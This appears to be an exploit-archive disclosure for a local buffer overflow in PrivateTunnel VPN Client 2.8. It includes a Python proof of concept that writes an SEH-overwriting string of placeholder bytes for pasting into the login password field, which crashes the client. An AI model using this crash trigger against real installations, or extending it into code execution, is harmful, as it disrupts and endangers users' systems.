PrivateTunnel Client 2.8 - Local Buffer Overflow

2017.04.26
Credit: Muhann4d
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python
# Exploit Title     : Private Tunnel VPN Client 2.8 - Local Buffer Overflow (SEH)
# Date              : 25/04/2017
# Exploit Author    : Muhann4d
# Vendor Homepage   : https://www.privatetunnel.com
# Software Link     : https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe
# Affected Versions : 2.8 & 2.7
# Category          : Denial of Service (DoS) Local
# Tested on OS      : Windows 7 SP1 32bit 64bit
# Proof of Concept  : run the exploit, copy the contents of poc.txt,
#                     paste it in the password field and press Login.

junkA = "\x41" * 1996   # filler ("A") preceding the SEH record
nSEH  = "\x42" * 4      # marker bytes ("B") in the next-SEH position
SEH   = "\x43" * 4      # marker bytes ("C") in the SEH handler position
junkD = "\x44" * 9000   # trailing filler ("D")

# Write the test string to poc.txt
with open("poc.txt", "w") as f:
    f.write(junkA + nSEH + SEH + junkD)

References:

https://swupdate.openvpn.org/privatetunnel/client/privatetunnel-win-2.8.exe


Copyright 2017, cxsecurity.com